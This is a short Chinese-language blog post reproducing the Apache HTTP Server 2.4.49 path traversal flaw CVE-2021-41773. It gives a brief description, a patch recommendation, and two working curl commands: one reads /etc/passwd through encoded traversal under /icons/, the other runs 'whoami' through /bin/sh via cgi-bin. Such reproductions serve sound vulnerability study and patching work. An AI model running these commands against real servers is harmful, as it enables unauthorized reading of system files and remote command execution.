apache 文件读取&命令执行(CVE-2021-41773)

漏洞描述:

CVE-2021-41773 漏洞是在 9 月 15 日发布的 2.4.49 版中对路径规范化所做的更改引入到 Apache HTTP Server 中的。此漏洞仅影响具有"require all denied"访问权限控制配置被禁用的Apache HTTP Server 2.4.49 版本。成功的利用将使远程攻击者能够访问易受攻击的 Web 服务器上文档根目录之外的任意文件。根据该公告,该漏洞还可能泄露"CGI 脚本等解释文件的来源",其中可能包含攻击者可以利用该漏洞进行进一步攻击的敏感信息。

复现过程:

1.访问ip:port

2.文件读取

cs 复制代码
curl -v --path-as-is http://ip:port/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

3.命令执行

cs 复制代码
curl --data "echo;whoami" http://ip:port/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh

修复建议:

确保Apache HTTP Server更新到最新的版本2.4.50。

相关推荐
腾科张老师8 小时前
如何进行Apache的配置与调试?
apache
DC_BLOG8 小时前
Linux-Apache静态资源
linux·运维·apache
木古古181 天前
使用chrome 访问虚拟机Apache2 的默认页面,出现了ERR_ADDRESS_UNREACHABLE这个鸟问题
前端·chrome·apache
疯一样的码农1 天前
Apache Maven简介
java·maven·apache
疯一样的码农1 天前
Apache Maven 标准文件目录布局
java·maven·apache
千羽星弦1 天前
Apache和HTTPS证书的生成与安装
网络协议·https·apache
high20112 天前
【Apache Paimon】-- 5 -- Flink 向 Paimon 表写入数据
linux·flink·apache·paimon
.Ayang2 天前
【vulhub】Apache 多后缀解析漏洞(apache_parsing_vulnerability)
网络·安全·web安全·网络安全·系统安全·apache·网络攻击模型
Evaporator Core4 天前
Apache Doris:深度优化与最佳实践
apache
hzc1910255 天前
apache2配置多站点
apache·网站